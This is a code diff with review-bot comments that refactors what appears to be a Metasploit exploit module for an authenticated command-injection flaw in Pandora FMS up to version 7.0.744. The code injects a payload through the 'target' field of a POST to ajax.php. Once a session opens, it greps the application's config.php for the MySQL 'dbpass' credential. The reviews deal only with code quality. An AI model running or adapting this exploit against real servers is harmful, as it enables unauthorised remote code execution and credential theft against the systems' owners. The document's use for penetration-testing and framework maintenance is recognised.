diff --git a/modules/exploits/linux/http/pandora_fms_events_exec.rb b/modules/exploits/linux/http/pandora_fms_events_exec.rb
index 85fc4eb998..5479babe79 100644
--- a/modules/exploits/linux/http/pandora_fms_events_exec.rb
+++ b/modules/exploits/linux/http/pandora_fms_events_exec.rb
@@ -83,23 +83,23 @@ class MetasploitModule < Msf::Exploit::Remote
 html = res.get_html_document
 full_version = html.at('div[@id="ver_num"]').text
- unless full_version && (!full_version.to_s.eql? '')
+ if full_version.blank?
 return CheckCode::Detected('Could not determine the Pandora FMS version.')
 end
 version = full_version[1..-1].gsub!('NG', '')
- unless version && (!version.to_s.eql? '')
+ if version.blank?
 return CheckCode::Detected('Could not determine the Pandora FMS version.')
 end
 version = Gem::Version.new version
 unless version <= Gem::Version.new('7.0.744')
- return CheckCode::Safe("Target is Pandora FMS with version #{full_version}.")
+ return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")
 end
- CheckCode::Appears("Target is Pandora FMS with version #{full_version}.")
+ CheckCode::Appears("Target is Pandora FMS version #{full_version}.")
 end
 def login(user, pass)
@@ -125,15 +125,13 @@ class MetasploitModule < Msf::Exploit::Remote
 fail_with Failure::NoAccess, 'Authentication failed'
 end
- redirect = res.headers['Location']
-
- unless redirect && redirect.to_s != ''
+ if res.headers['Location'].to_s == ''
 fail_with Failure::NoAccess, 'Authentication failed'
 end
 res = send_request_cgi({
 'method' => 'GET',
- 'uri' => redirect,
+ 'uri' => res.headers['Location'],
 'cookie' => @cookie
 })
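Review bot: The unchanged `version = full_version[1..-1].gsub!('NG', '')` line returns nil whenever the string contains no `NG`, so the new `if version.blank?` guard will report CheckCode::Detected for a version string that was in fact present and parseable; the non-bang form, `version = full_version[1..-1].gsub('NG', '')`, keeps the string in that case. The `html.at('div[@id="ver_num"]').text` line presumably raises NoMethodError when the element is absent, before the new `full_version.blank?` guard can run; `html.at('div[@id="ver_num"]')&.text` would route that case into the guard as well. Gem::Version.new may also raise ArgumentError on a malformed version string, which I would confirm and rescue into the same Detected result. The enclosing check method starts before this hunk.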
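Review bot: The new `if res.headers['Location'].to_s == ''` test uses a different emptiness idiom from the `blank?` guards this same commit introduces in check, and removing the `redirect` local means the header is looked up a second time in the request hash below. Keeping the local and the same predicate reads more consistently: `redirect = res.headers['Location']`, `fail_with Failure::NoAccess, 'Authentication failed' if redirect.blank?`, and `'uri' => redirect` in the request. login begins before this hunk and continues past its last line.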
@@ -146,28 +144,30 @@ class MetasploitModule < Msf::Exploit::Remote
 def on_new_session(client)
 super
- print_status('Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.')
- command = 'cat include/config.php | grep dbpass'
- client.shell_write(command + "\n")
+ print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
+ client.shell_write("grep dbpass include/config.php\n")
 end
 def execute_command(cmd, _opts = {})
 print_status('Executing payload...')
- referer_url = normalize_uri(target_uri.path, 'index.php', '?sec=eventos&sec2=operation/events/events')
- data = 'page=include/ajax/events&perform_event_response=10000000'
- data << "&target=#{cmd}"
- data << '&response_id=1'
+ referer_url = normalize_uri(target_uri.path, 'index.php')
- # using a raw request to prevent the post data from being encoded, which would prevent exploitation
- send_request_raw({
+ send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, 'ajax.php'),
 'cookie' => @cookie,
- 'headers' => {
- 'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
- 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'
+ 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
+ 'vars_get' => {
+ 'sec' => 'eventos',
+ 'sec2' => 'operation/events/events'
 },
- 'data' => data
+ 'vars_post' => {
+ 'page' => 'include/ajax/events',
+ 'perform_event_response' => '10000000',
+ 'target' => cmd.to_s,
+ 'response_id' => '1'
+ }
 }, 0) # the server will not send a response, so the module shouldn't wait for one
 end
@@ -180,6 +180,6 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 login(datastore['USERNAME'], datastore['PASSWORD'])
- execute_command payload.encoded.gsub(/&/, '%26')
+ execute_command payload.encoded
 end
 end
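Review bot: The comment that recorded why the POST body used to be assembled by hand was deleted with the raw request, and nothing in execute_command now states that `vars_post` values are form-encoded by send_request_cgi, which is also why the `%26` substitution in exploit is dropped in the last hunk of this diff. A one-line comment above `'vars_post' => {`, e.g. `# vars_post values are form-encoded by send_request_cgi, so no manual escaping of the payload is needed`, would keep that rationale next to the code it explains. The `'target' => cmd.to_s` conversion looks redundant if cmd is already a String, as the `#{cmd}` interpolation on the removed side suggests; I would confirm the caller's type before keeping it.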